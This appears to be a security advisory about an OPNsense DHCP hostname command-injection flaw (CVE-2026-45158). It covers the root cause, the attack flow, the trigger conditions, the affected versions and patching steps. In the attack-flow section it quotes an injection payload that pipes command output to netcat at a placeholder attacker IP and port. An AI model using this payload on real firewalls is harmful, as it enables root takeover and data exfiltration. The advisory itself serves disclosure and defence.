Introduction
A single unsanitized hostname field in OPNsense's DHCP configuration grants any authenticated user with interface privileges the ability to execute arbitrary commands as root on the underlying FreeBSD operating system. With a CVSS score of 9.1 and public exploit code already available, CVE-2026-45158 represents a serious escalation path in environments that rely on OPNsense as their perimeter firewall.
OPNsense is a FreeBSD based open source firewall and routing platform, forked from pfSense in 2015 and sponsored by Deciso BV in the Netherlands. It is widely deployed across Europe in thousands of small and medium business networks, datacentres, and government environments, serving as a sovereign and cost conscious alternative to commercial appliances from Cisco, Fortinet, Sophos, and Palo Alto.
Technical Information
Root Cause: Unsanitized Input in Shell Context
The vulnerability resides in the src/etc/inc/interfaces.inc file, specifically within the interface_dhcp_configure function. The OPNsense Web UI allows users who hold page-interfaces privileges to enable and configure network interfaces. When an interface is configured with DHCP enabled on IPv4, the application exposes a hostname field.
The value entered in this hostname field is written directly into the /var/etc/dhclient.<device>.conf file with no sanitization whatsoever. This is where the design flaw becomes critical: the configuration file is not treated as a pure data file. It supports parameters such as media that are later passed to shell scripts as environment variables.
Attack Flow
The exploitation path follows a clear sequence:
-
An attacker with
page-interfacesprivileges in the OPNsense Web UI navigates to the interface configuration page and enables DHCP on an IPv4 interface. -
In the hostname field, the attacker enters a crafted payload that breaks out of the standard configuration statement and injects a
mediaparameter containing shell commands. The example payload from the security advisory is:
test"; media "aa; id | nc <attacker-ip> <attacker-port>"; } /*
-
This payload is written verbatim into the
/var/etc/dhclient.<device>.conffile, resulting in a configuration file that now includes the injectedmediaparameter. -
Before DHCPDISCOVER requests are made by the operating system, the
dhclientutility invokes the/usr/local/opnsense/scripts/interfaces/dhclient-scriptshell script. -
The shell script attempts to use the
mediavalue with theifconfigcommand inside anevalstatement, again without any sanitization. -
The injected command executes in the shell context with root privileges.
Trigger Conditions
There are two distinct trigger paths, which makes this vulnerability particularly noteworthy:
Immediate trigger: The injected payload executes as soon as the user clicks the "Apply" button in the UI, which causes the DHCP client to reconfigure.
Delayed trigger: If the configuration is saved but not immediately applied, the payload will execute during the next DHCP lease renewal or system reboot. This creates a persistence mechanism where an attacker can plant the payload and disconnect, knowing it will fire on the next natural renewal cycle.
Vulnerability Classification
The flaw is classified under CWE-88 (Improper Neutralization of Argument Delimiters in a Command, commonly known as argument injection). The core issue is that user controlled data flows from a web form into a configuration file and then into a shell eval statement without any boundary enforcement or input validation at any stage.
Affected Systems and Versions
All OPNsense versions up to and including 26.1.7 are affected. This applies to both the Community Edition and the Business Edition.
| Product Edition | Vulnerable Versions | Primary Fix Version | Required Hotfix |
|---|---|---|---|
| OPNsense Community Edition | 26.1.7 and older | 26.1.8 | 26.1.8_5 |
| OPNsense Business Edition | 26.1.7 and older | 26.1.8 | 26.1.8_5 |
Administrators should ensure they reach at least version 26.1.8_5, which includes the follow up sanitization of DHCPv4 settings. The current version can be checked via the command line:
opnsense-version
To apply the update:
opnsense-update -vkr 26.1.8
After updating, organizations should force a DHCP lease renewal or reboot the appliance to flush any latent payloads that might be waiting for a renewal trigger. Administrators should also audit user accounts and restrict page-interfaces privileges to only essential personnel.
Vendor Security History
The OPNsense team demonstrated a rapid response cadence during May 2026. Version 26.1.8 was shipped on May 12, 2026, patching two critical remote code execution flaws within a seven day period. Following the initial release, the vendor quickly issued hotfix 26.1.8_5 to provide additional safeguards and further sanitize DHCPv4 settings. This iterative approach, shipping a fix and then hardening it with a follow up hotfix, reflects a proactive posture toward defense in depth.



